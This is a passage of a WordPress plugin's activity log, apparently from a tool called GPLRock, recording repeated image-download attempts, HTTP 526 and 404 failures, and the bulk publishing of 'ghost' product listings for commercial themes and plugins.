redias-business-consulting-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:47:01 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/redias---business-consulting-wordpress-theme-13848.webp for product redias-business-consulting-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 16:47:01 UTC] GPLRock: Image download failed for product redias-business-consulting-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:47:03 UTC] GPLRock: Image download failed for product redias-business-consulting-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:47:05 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/redias---business-consulting-wordpress-theme-13848.webp for product redias-business-consulting-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 16:47:05 UTC] GPLRock WARNING: Image download failed for product redias-business-consulting-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/redias---business-consulting-wordpress-theme-13848.webp [05-Apr-2026 16:47:05 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: redias-business-consulting-wordpress-theme [05-Apr-2026 16:47:32 UTC] GPLRock: Image downloaded successfully for product studiopress-hello-pro-genesis-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-eb287af5.jpg [05-Apr-2026 16:47:32 UTC] GPLRock: Using pre-downloaded image for product studiopress-hello-pro-genesis-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-eb287af5.jpg [05-Apr-2026 16:47:32 UTC] GPLRock: Ghost product published with image - Product ID: studiopress-hello-pro-genesis-wordpress-theme [05-Apr-2026 16:47:34 UTC] GPLRock: Image downloaded successfully for product table-rate-shipping-for-woocommerce (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-29fae843.jpg [05-Apr-2026 16:47:34 UTC] GPLRock: Using pre-downloaded image for product table-rate-shipping-for-woocommerce: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-29fae843.jpg [05-Apr-2026 16:47:34 UTC] GPLRock: Ghost product published with image - Product ID: table-rate-shipping-for-woocommerce [05-Apr-2026 16:47:35 UTC] GPLRock: Image downloaded successfully for product mythemeshop-woocommerce-checkout-field-modifier (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-d282e4d9.jpg [05-Apr-2026 16:47:35 UTC] GPLRock: Using pre-downloaded image for product mythemeshop-woocommerce-checkout-field-modifier: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-d282e4d9.jpg [05-Apr-2026 16:47:35 UTC] GPLRock: Ghost product published with image - Product ID: mythemeshop-woocommerce-checkout-field-modifier [05-Apr-2026 16:47:37 UTC] GPLRock: Image downloaded successfully for product moxie-responsive-theme-for-wordpress (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-9fad58c8.jpg [05-Apr-2026 16:47:37 UTC] GPLRock: Using pre-downloaded image for product moxie-responsive-theme-for-wordpress: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-9fad58c8.jpg [05-Apr-2026 16:47:37 UTC] GPLRock: Ghost product published with image - Product ID: moxie-responsive-theme-for-wordpress [05-Apr-2026 16:47:38 UTC] GPLRock: Image downloaded successfully for product restrict-content-pro-activecampaign (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-4de211b9.jpg [05-Apr-2026 16:47:38 UTC] GPLRock: Using pre-downloaded image for product restrict-content-pro-activecampaign: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-4de211b9.jpg [05-Apr-2026 16:47:38 UTC] GPLRock: Ghost product published with image - Product ID: restrict-content-pro-activecampaign [05-Apr-2026 16:47:40 UTC] GPLRock: Image downloaded successfully for product css-igniter-santorini-resort-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-5ae4fbba.jpg [05-Apr-2026 16:47:40 UTC] GPLRock: Using pre-downloaded image for product css-igniter-santorini-resort-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-5ae4fbba.jpg [05-Apr-2026 16:47:40 UTC] GPLRock: Ghost product published with image - Product ID: css-igniter-santorini-resort-wordpress-theme [05-Apr-2026 16:47:42 UTC] GPLRock: Image downloaded successfully for product network-merchants-payment-gateway-for-woocommerce (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-9328ff4c.jpg [05-Apr-2026 16:47:42 UTC] GPLRock: Using pre-downloaded image for product network-merchants-payment-gateway-for-woocommerce: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-9328ff4c.jpg [05-Apr-2026 16:47:42 UTC] GPLRock: Ghost product published with image - Product ID: network-merchants-payment-gateway-for-woocommerce [05-Apr-2026 16:47:43 UTC] GPLRock: Image downloaded successfully for product ninja-forms-excel-export (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-ee1268c7.jpg [05-Apr-2026 16:47:43 UTC] GPLRock: Using pre-downloaded image for product ninja-forms-excel-export: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-ee1268c7.jpg [05-Apr-2026 16:47:43 UTC] GPLRock: Ghost product published with image - Product ID: ninja-forms-excel-export [05-Apr-2026 16:47:44 UTC] GPLRock: Image downloaded successfully for product wp-job-manager-simple-paid-listings-addon (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-e6bc5b1c.jpg [05-Apr-2026 16:47:44 UTC] GPLRock: Using pre-downloaded image for product wp-job-manager-simple-paid-listings-addon: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-e6bc5b1c.jpg [05-Apr-2026 16:47:44 UTC] GPLRock: Ghost product published with image - Product ID: wp-job-manager-simple-paid-listings-addon [05-Apr-2026 16:47:46 UTC] GPLRock: Image downloaded successfully for product graph-paper-press-sell-media-commissions (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-929a486d.jpg [05-Apr-2026 16:47:46 UTC] GPLRock: Using pre-downloaded image for product graph-paper-press-sell-media-commissions: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-929a486d.jpg [05-Apr-2026 16:47:46 UTC] GPLRock: Ghost product published with image - Product ID: graph-paper-press-sell-media-commissions [05-Apr-2026 16:48:43 UTC] GPLRock: Image downloaded successfully for product xventure-travel-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-31631817.webp [05-Apr-2026 16:48:43 UTC] GPLRock: Using pre-downloaded image for product xventure-travel-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-31631817.webp [05-Apr-2026 16:48:43 UTC] GPLRock: Ghost product published with image - Product ID: xventure-travel-elementor-template-kit [05-Apr-2026 16:48:45 UTC] GPLRock: Image downloaded successfully for product xsapp-saas-company-elementor-template-kit-zip (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-b3a2ae27.jpg [05-Apr-2026 16:48:45 UTC] GPLRock: Using pre-downloaded image for product xsapp-saas-company-elementor-template-kit-zip: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-b3a2ae27.jpg [05-Apr-2026 16:48:45 UTC] GPLRock: Ghost product published with image - Product ID: xsapp-saas-company-elementor-template-kit-zip [05-Apr-2026 16:48:46 UTC] GPLRock: Image downloaded successfully for product xoox-architecture-agency-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-e0abd42a.webp [05-Apr-2026 16:48:46 UTC] GPLRock: Using pre-downloaded image for product xoox-architecture-agency-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-e0abd42a.webp [05-Apr-2026 16:48:46 UTC] GPLRock: Ghost product published with image - Product ID: xoox-architecture-agency-elementor-template-kit [05-Apr-2026 16:48:48 UTC] GPLRock: Image downloaded successfully for product xerces-creative-digital-agency-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-ca2be177.webp [05-Apr-2026 16:48:48 UTC] GPLRock: Using pre-downloaded image for product xerces-creative-digital-agency-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-ca2be177.webp [05-Apr-2026 16:48:48 UTC] GPLRock: Ghost product published with image - Product ID: xerces-creative-digital-agency-elementor-template-kit [05-Apr-2026 16:48:49 UTC] GPLRock: Image downloaded successfully for product xatcro-factory-industrial-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-df873f64.webp [05-Apr-2026 16:48:49 UTC] GPLRock: Using pre-downloaded image for product xatcro-factory-industrial-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-df873f64.webp [05-Apr-2026 16:48:49 UTC] GPLRock: Ghost product published with image - Product ID: xatcro-factory-industrial-elementor-template-kit [05-Apr-2026 16:48:51 UTC] GPLRock: Image downloaded successfully for product xarris-saas-startup-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-c9ba2b68.webp [05-Apr-2026 16:48:51 UTC] GPLRock: Using pre-downloaded image for product xarris-saas-startup-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-c9ba2b68.webp [05-Apr-2026 16:48:51 UTC] GPLRock: Ghost product published with image - Product ID: xarris-saas-startup-elementor-template-kit [05-Apr-2026 16:48:52 UTC] GPLRock: Image downloaded successfully for product woki-creative-agency-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-84628e4a.webp [05-Apr-2026 16:48:52 UTC] GPLRock: Using pre-downloaded image for product woki-creative-agency-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-84628e4a.webp [05-Apr-2026 16:48:52 UTC] GPLRock: Ghost product published with image - Product ID: woki-creative-agency-elementor-template-kit [05-Apr-2026 16:48:53 UTC] GPLRock: Image downloaded successfully for product wiras-covid-19-health-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-144fa62c.webp [05-Apr-2026 16:48:54 UTC] GPLRock: Using pre-downloaded image for product wiras-covid-19-health-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-144fa62c.webp [05-Apr-2026 16:48:54 UTC] GPLRock: Ghost product published with image - Product ID: wiras-covid-19-health-elementor-template-kit [05-Apr-2026 16:48:55 UTC] GPLRock: Image downloaded successfully for product windco-doors-windows-service-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-3260e69a.jpg [05-Apr-2026 16:48:55 UTC] GPLRock: Using pre-downloaded image for product windco-doors-windows-service-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-3260e69a.jpg [05-Apr-2026 16:48:55 UTC] GPLRock: Ghost product published with image - Product ID: windco-doors-windows-service-elementor-template-kit [05-Apr-2026 16:48:57 UTC] GPLRock: Image downloaded successfully for product widocline-professional-window-cleaning-services-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-051aee88.webp [05-Apr-2026 16:48:57 UTC] GPLRock: Using pre-downloaded image for product widocline-professional-window-cleaning-services-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-051aee88.webp [05-Apr-2026 16:48:57 UTC] GPLRock: Ghost product published with image - Product ID: widocline-professional-window-cleaning-services-template-kit [05-Apr-2026 16:49:52 UTC] GPLRock: Image download failed for product luxsa-fashion-woocommerce-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:49:54 UTC] GPLRock: Image download failed for product luxsa-fashion-woocommerce-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:49:56 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/luxsa---fashion-woocommerce-theme-6668.webp for product luxsa-fashion-woocommerce-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 16:49:56 UTC] GPLRock: Image download failed for product luxsa-fashion-woocommerce-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:49:58 UTC] GPLRock: Image download failed for product luxsa-fashion-woocommerce-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:50:00 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/luxsa---fashion-woocommerce-theme-6668.webp for product luxsa-fashion-woocommerce-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 16:50:00 UTC] GPLRock WARNING: Image download failed for product luxsa-fashion-woocommerce-theme. URL: https://meldwp.com/wp-content/uploads/luxsa---fashion-woocommerce-theme-6668.webp [05-Apr-2026 16:50:00 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: luxsa-fashion-woocommerce-theme [05-Apr-2026 16:50:01 UTC] GPLRock: Image download failed for product reflekt-minimalist-portfolio-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:50:03 UTC] GPLRock: Image download failed for product reflekt-minimalist-portfolio-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:50:05 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/reflekt---minimalist-portfolio-theme-10221.webp for product reflekt-minimalist-portfolio-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 16:50:05 UTC] GPLRock: Image download failed for product reflekt-minimalist-portfolio-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:50:07 UTC] GPLRock: Image download failed for product reflekt-minimalist-portfolio-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:50:09 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/reflekt---minimalist-portfolio-theme-10221.webp for product reflekt-minimalist-portfolio-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 16:50:09 UTC] GPLRock WARNING: Image download failed for product reflekt-minimalist-portfolio-theme. URL: https://meldwp.com/wp-content/uploads/reflekt---minimalist-portfolio-theme-10221.webp [05-Apr-2026 16:50:09 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: reflekt-minimalist-portfolio-theme [05-Apr-2026 16:50:09 UTC] GPLRock: Image downloaded successfully for product xolio-creative-agency-portfolio-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-558f6961.webp [05-Apr-2026 16:50:09 UTC] GPLRock: Using pre-downloaded image for product xolio-creative-agency-portfolio-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-558f6961.webp [05-Apr-2026 16:50:09 UTC] GPLRock: Ghost product published with image - Product ID: xolio-creative-agency-portfolio-wordpress-theme [05-Apr-2026 16:50:09 UTC] GPLRock: Image download failed for product neotek-saas-and-software-company-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:50:12 UTC] GPLRock: Image download failed for product neotek-saas-and-software-company-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:50:14 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/neotek---saas-and-software-company-wordpress-theme-16834.webp for product neotek-saas-and-software-company-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 16:50:14 UTC] GPLRock: Image download failed for product neotek-saas-and-software-company-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:50:16 UTC] GPLRock: Image download failed for product neotek-saas-and-software-company-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:50:18 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/neotek---saas-and-software-company-wordpress-theme-16834.webp for product neotek-saas-and-software-company-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 16:50:18 UTC] GPLRock WARNING: Image download failed for product neotek-saas-and-software-company-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/neotek---saas-and-software-company-wordpress-theme-16834.webp [05-Apr-2026 16:50:18 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: neotek-saas-and-software-company-wordpress-theme [05-Apr-2026 16:50:18 UTC] GPLRock: Image download failed for product benqu-elementor-newspaper-magazine-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:50:20 UTC] GPLRock: Image download failed for product benqu-elementor-newspaper-magazine-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:50:22 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/benqu---elementor-newspaper--magazine-wordpress-theme-29418.webp for product benqu-elementor-newspaper-magazine-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 16:50:23 UTC] GPLRock: Image download failed for product benqu-elementor-newspaper-magazine-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:50:25 UTC] GPLRock: Image download failed for product benqu-elementor-newspaper-magazine-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:50:27 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/benqu---elementor-newspaper--magazine-wordpress-theme-29418.webp for product benqu-elementor-newspaper-magazine-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 16:50:27 UTC] GPLRock WARNING: Image download failed for product benqu-elementor-newspaper-magazine-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/benqu---elementor-newspaper--magazine-wordpress-theme-29418.webp [05-Apr-2026 16:50:27 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: benqu-elementor-newspaper-magazine-wordpress-theme [05-Apr-2026 16:50:27 UTC] GPLRock: Image download failed for product anomica-it-solutions-and-services-wordpress-theme-rtl (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:50:29 UTC] GPLRock: Image download failed for product anomica-it-solutions-and-services-wordpress-theme-rtl (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:50:31 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/anomica---it-solutions-and-services-wordpress-theme--rtl-5228.webp for product anomica-it-solutions-and-services-wordpress-theme-rtl after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 16:50:31 UTC] GPLRock: Image download failed for product anomica-it-solutions-and-services-wordpress-theme-rtl (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:50:33 UTC] GPLRock: Image download failed for product anomica-it-solutions-and-services-wordpress-theme-rtl (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:50:35 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/anomica---it-solutions-and-services-wordpress-theme--rtl-5228.webp for product anomica-it-solutions-and-services-wordpress-theme-rtl after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 16:50:35 UTC] GPLRock WARNING: Image download failed for product anomica-it-solutions-and-services-wordpress-theme-rtl. URL: https://meldwp.com/wp-content/uploads/anomica---it-solutions-and-services-wordpress-theme--rtl-5228.webp [05-Apr-2026 16:50:35 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: anomica-it-solutions-and-services-wordpress-theme-rtl [05-Apr-2026 16:50:36 UTC] GPLRock: Image download failed for product travelador-blog-tourism-woocommerce-shop-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:50:38 UTC] GPLRock: Image download failed for product travelador-blog-tourism-woocommerce-shop-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:50:40 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/travelador---blog-tourism--woocommerce-shop-theme-15194.webp for product travelador-blog-tourism-woocommerce-shop-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 16:50:40 UTC] GPLRock: Image download failed for product travelador-blog-tourism-woocommerce-shop-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:50:42 UTC] GPLRock: Image download failed for product travelador-blog-tourism-woocommerce-shop-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:50:44 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/travelador---blog-tourism--woocommerce-shop-theme-15194.webp for product travelador-blog-tourism-woocommerce-shop-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 16:50:44 UTC] GPLRock WARNING: Image download failed for product travelador-blog-tourism-woocommerce-shop-theme. URL: https://meldwp.com/wp-content/uploads/travelador---blog-tourism--woocommerce-shop-theme-15194.webp [05-Apr-2026 16:50:44 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: travelador-blog-tourism-woocommerce-shop-theme [05-Apr-2026 16:50:44 UTC] GPLRock: Image download failed for product qaween-wedding-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:50:46 UTC] GPLRock: Image download failed for product qaween-wedding-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:50:48 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/qaween---wedding-wordpress-theme-1340.webp for product qaween-wedding-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 16:50:49 UTC] GPLRock: Image download failed for product qaween-wedding-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:50:51 UTC] GPLRock: Image download failed for product qaween-wedding-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:50:53 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/qaween---wedding-wordpress-theme-1340.webp for product qaween-wedding-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 16:50:53 UTC] GPLRock WARNING: Image download failed for product qaween-wedding-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/qaween---wedding-wordpress-theme-1340.webp [05-Apr-2026 16:50:53 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: qaween-wedding-wordpress-theme [05-Apr-2026 16:50:53 UTC] GPLRock: Image download failed for product maya-smart-and-powerful-wp-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:50:55 UTC] GPLRock: Image download failed for product maya-smart-and-powerful-wp-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:50:57 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/maya---smart-and-powerful-wp-theme-22425.webp for product maya-smart-and-powerful-wp-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 16:50:57 UTC] GPLRock: Image download failed for product maya-smart-and-powerful-wp-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:50:59 UTC] GPLRock: Image download failed for product maya-smart-and-powerful-wp-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:51:01 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/maya---smart-and-powerful-wp-theme-22425.webp for product maya-smart-and-powerful-wp-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 16:51:01 UTC] GPLRock WARNING: Image download failed for product maya-smart-and-powerful-wp-theme. URL: https://meldwp.com/wp-content/uploads/maya---smart-and-powerful-wp-theme-22425.webp [05-Apr-2026 16:51:01 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: maya-smart-and-powerful-wp-theme [05-Apr-2026 16:51:02 UTC] GPLRock: Image downloaded successfully for product mygrace-churches-and-charity-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-1a2c6c23.webp [05-Apr-2026 16:51:02 UTC] GPLRock: Using pre-downloaded image for product mygrace-churches-and-charity-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-1a2c6c23.webp [05-Apr-2026 16:51:02 UTC] GPLRock: Ghost product published with image - Product ID: mygrace-churches-and-charity-wordpress-theme [05-Apr-2026 16:52:51 UTC] GPLRock: Image downloaded successfully for product bookly-pro-appointment-booking-and-scheduling-software-system (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-3eba188e.jpg [05-Apr-2026 16:52:51 UTC] GPLRock: Using pre-downloaded image for product bookly-pro-appointment-booking-and-scheduling-software-system: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-3eba188e.jpg [05-Apr-2026 16:52:51 UTC] GPLRock: Ghost product published with image - Product ID: bookly-pro-appointment-booking-and-scheduling-software-system [05-Apr-2026 16:52:54 UTC] GPLRock: Image download failed for product leverage-creative-agency-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 404, Error: . Retrying... [05-Apr-2026 16:52:58 UTC] GPLRock: Image download failed for product leverage-creative-agency-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 404, Error: . Retrying... [05-Apr-2026 16:53:02 UTC] GPLRock Error: Failed to download image from https://www.gplrock.com/wp-content/uploads/2020/07/Leverage-Creative-Agency-Portfolio-WordPress-Theme.jpg for product leverage-creative-agency-portfolio-wordpress-theme after 3 attempts. HTTP Code: 404, Error: [05-Apr-2026 16:53:04 UTC] GPLRock: Image download failed for product leverage-creative-agency-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 404, Error: . Retrying... [05-Apr-2026 16:53:09 UTC] GPLRock: Image download failed for product leverage-creative-agency-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 404, Error: . Retrying... [05-Apr-2026 16:53:13 UTC] GPLRock Error: Failed to download image from https://www.gplrock.com/wp-content/uploads/2020/07/Leverage-Creative-Agency-Portfolio-WordPress-Theme.jpg for product leverage-creative-agency-portfolio-wordpress-theme after 3 attempts. HTTP Code: 404, Error: [05-Apr-2026 16:53:13 UTC] GPLRock WARNING: Image download failed for product leverage-creative-agency-portfolio-wordpress-theme. URL: https://www.gplrock.com/wp-content/uploads/2020/07/Leverage-Creative-Agency-Portfolio-WordPress-Theme.jpg [05-Apr-2026 16:53:13 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: leverage-creative-agency-portfolio-wordpress-theme [05-Apr-2026 16:53:14 UTC] GPLRock: Image downloaded successfully for product affiliate-egg-pro-niche-affiliate-marketing-wordpress-plugin (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-602b7471.jpg [05-Apr-2026 16:53:14 UTC] GPLRock: Using pre-downloaded image for product affiliate-egg-pro-niche-affiliate-marketing-wordpress-plugin: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-602b7471.jpg [05-Apr-2026 16:53:14 UTC] GPLRock: Ghost product published with image - Product ID: affiliate-egg-pro-niche-affiliate-marketing-wordpress-plugin [05-Apr-2026 16:53:16 UTC] GPLRock: Image downloaded successfully for product woocommerce-frontend-manager-ultimate-wcfm (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-80f88c3e.png [05-Apr-2026 16:53:16 UTC] GPLRock: Using pre-downloaded image for product woocommerce-frontend-manager-ultimate-wcfm: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-80f88c3e.png [05-Apr-2026 16:53:16 UTC] GPLRock: Ghost product published with image - Product ID: woocommerce-frontend-manager-ultimate-wcfm [05-Apr-2026 16:53:18 UTC] GPLRock: Image downloaded successfully for product smarty-school-kindergarten-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-b24fe7ed.jpg [05-Apr-2026 16:53:18 UTC] GPLRock: Using pre-downloaded image for product smarty-school-kindergarten-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-b24fe7ed.jpg [05-Apr-2026 16:53:18 UTC] GPLRock: Ghost product published with image - Product ID: smarty-school-kindergarten-wordpress-theme [05-Apr-2026 16:53:19 UTC] GPLRock: Image downloaded successfully for product discy-social-questions-and-answers-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-44161be3.png [05-Apr-2026 16:53:19 UTC] GPLRock: Using pre-downloaded image for product 